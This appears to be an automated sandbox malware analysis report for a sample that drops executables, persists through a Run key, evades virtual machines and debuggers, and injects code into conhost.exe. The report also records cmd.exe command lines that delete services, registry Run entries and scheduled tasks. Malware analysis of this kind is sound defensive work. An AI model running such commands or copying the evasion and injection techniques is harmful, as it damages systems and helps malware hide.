    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\2[1].exe
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\6[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\8[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\9[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\38822795.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\10[1].exe
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe | File created: C:\Users\user\AppData\Local\Temp\230053364.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\2028814805.exe
    Source: C:\Windows\sysludpvs.exe | File created: C:\Users\user\AppData\Local\Temp\152942395.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\2860723397.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Temp\396820397.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\1[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\5[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | File created: C:\Windows\sysludpvs.exe

    Boot Survival

    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows Settings
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc delete "Windows Services"

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe -> File opened: C:\Users\user\AppData\Local\Temp\230053364.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\230053364.exe -> File opened: C:\Users\user\AppData\Local\Temp\230053364.exe:Zone.Identifier read attributes | delete
    Source: C:\Windows\sysludpvs.exe -> File opened: C:\Windows\sysludpvs.exe:Zone.Identifier read attributes | delete
    Source: C:\Windows\sysludpvs.exe -> File opened: C:\Users\user\AppData\Local\Temp\152942395.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\634722489.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\2052810334.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\417928448.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\2047112978.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\399630275.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\2028814805.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\393932919.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\1216017805.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\38822795.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\396820397.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\203235335.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> File opened: C:\Users\user\AppData\Local\Temp\2860723397.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exe -> Process information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\AppData\Local\Temp\152942395.exe -> Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exe -> Process information set: NOOPENFILEERRORBOX (26 events)
    Source: C:\Windows\System32\WerFault.exe -> Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 events)
    Source: C:\Windows\System32\WerFault.exe -> Process information set: NOOPENFILEERRORBOX (51 events)
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe -> Process information set: NOOPENFILEERRORBOX (20 events)
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe -> Process information set: NOOPENFILEERRORBOX (20 events)

    Malware Analysis System Evasion

    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040CE601_2_0040CE60
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040CE602_2_0040CE60
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040CE607_2_0040CE60
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-4386
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_1-4386
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-4386
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_1-4386
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeMemory allocated: 8F0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeMemory allocated: 1AFD0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeMemory allocated: 1360000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeMemory allocated: 1BA20000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeMemory allocated: 1300000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeMemory allocated: 1B980000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeMemory allocated: 36E0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeMemory allocated: 1BCD0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeMemory allocated: B20000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeMemory allocated: 1B130000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeMemory allocated: EE0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeMemory allocated: 1B560000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeMemory allocated: EA0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeMemory allocated: 1B580000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeMemory allocated: E50000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeMemory allocated: 1B7B0000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeMemory allocated: 1A80000 memory reserve | memory write watch
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeMemory allocated: 1B9C0000 memory reserve | memory write watch
    Source: C:\Windows\sysludpvs.exeThread delayed: delay time: 900000
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\sysludpvs.exeWindow / User API: threadDelayed 1546
    Source: C:\Windows\sysludpvs.exeWindow / User API: threadDelayed 3954
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\203235335.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2860723397.exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\11[1].exe
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\12[1].exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvaded block: after key decisiongraph_1-4400
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvaded block: after key decisiongraph_1-4388
    Source: C:\Windows\sysludpvs.exeEvaded block: after key decisiongraph_7-4386
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_2-5789
    Source: C:\Windows\sysludpvs.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_2-5788
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_1-5319
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_1-4407
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeAPI coverage: 3.9 %
    Source: C:\Windows\sysludpvs.exeAPI coverage: 1.0 %
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040CE607_2_0040CE60
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040CE601_2_0040CE60
    Source: C:\Windows\sysludpvs.exe TID: 8676Thread sleep time: -40000s >= -30000s
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep count: 198 > 30
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep time: -396000s >= -30000s
    Source: C:\Windows\sysludpvs.exe TID: 8676Thread sleep count: 1546 > 30
    Source: C:\Windows\sysludpvs.exe TID: 8800Thread sleep count: 138 > 30
    Source: C:\Windows\sysludpvs.exe TID: 8708Thread sleep time: -900000s >= -30000s
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep count: 3954 > 30
    Source: C:\Windows\sysludpvs.exe TID: 8724Thread sleep time: -7908000s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exe TID: 6888Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\417928448.exe TID: 6652Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exe TID: 8408Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\399630275.exe TID: 3976Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exe TID: 1920Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\393932919.exe TID: 5536Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exe TID: 4944Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\38822795.exe TID: 9080Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Users\user\AppData\Local\Temp\396820397.exe TID: 3488Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00406690
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,1_2_004067D0
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00406690
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004067D0
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00406690 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406690
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004067D0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004067D0
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,1_2_00402020
    Source: C:\Windows\sysludpvs.exeThread delayed: delay time: 40000
    Source: C:\Windows\sysludpvs.exeThread delayed: delay time: 900000
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeThread delayed: delay time: 922337203685477
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeThread delayed: delay time: 922337203685477
    Source: Amcache.hve.12.drBinary or memory string: VMware
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.LOG1.12.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, a0RkmvhSaf.exe, 00000000.00000002.1380429916.0000000000CB7000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.000000000059E000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, 152942395.exe, 00000005.00000002.2128797812.0000000001064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: 152942395.exe, 00000005.00000002.2128797812.0000000001036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
    Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.LOG1.12.drBinary or memory string: VMware Virtual RAMX
    Source: Amcache.hve.12.drBinary or memory string: vmci.sys
    Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
    Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
    Source: 2028814805.exe, 00000021.00000002.1820333386.0000000000C8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
    Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.12.drBinary or memory string: VMware20,1
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.LOG1.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: sysludpvs.exe, 00000002.00000003.1445201251.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000003.1445675085.00000000005FC000.00000004.00000020.00020000.00000000.sdmp, sysludpvs.exe, 00000002.00000002.3804478092.00000000005FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
    Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeAPI call chain: ExitProcess graph end nodegraph_1-4387
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeAPI call chain: ExitProcess graph end nodegraph_1-4395
    Source: C:\Windows\sysludpvs.exeAPI call chain: ExitProcess graph end nodegraph_7-4421
    Source: C:\Windows\sysludpvs.exeAPI call chain: ExitProcess graph end nodegraph_7-4395
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess information queried: ProcessInformation
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00F81B48
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040A050 GetProcessHeaps,1_2_0040A050
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess token adjusted: Debug
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess token adjusted: Debug
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeCode function: 0_2_00F81B48 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,0_2_00F81B48
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeCode function: 5_2_007B1CA8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_007B1CA8
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeMemory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\AppData\Local\Temp\634722489.exeMemory allocated: C:\Windows\System32\conhost.exe base: 218E1C80000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeThread created: C:\Windows\System32\conhost.exe EIP: E1C80000
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtCreateThreadEx: Direct from: 0x401A17
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtWriteVirtualMemory: Direct from: 0x401D57
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtProtectVirtualMemory: Direct from: 0x401DD7
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtClose: Direct from: 0x401CD7
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeNtAllocateVirtualMemory: Direct from: 0x401D97
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeMemory written: C:\Windows\System32\conhost.exe base: 218E1C80000
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" ""
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "Windows Services"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpla"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
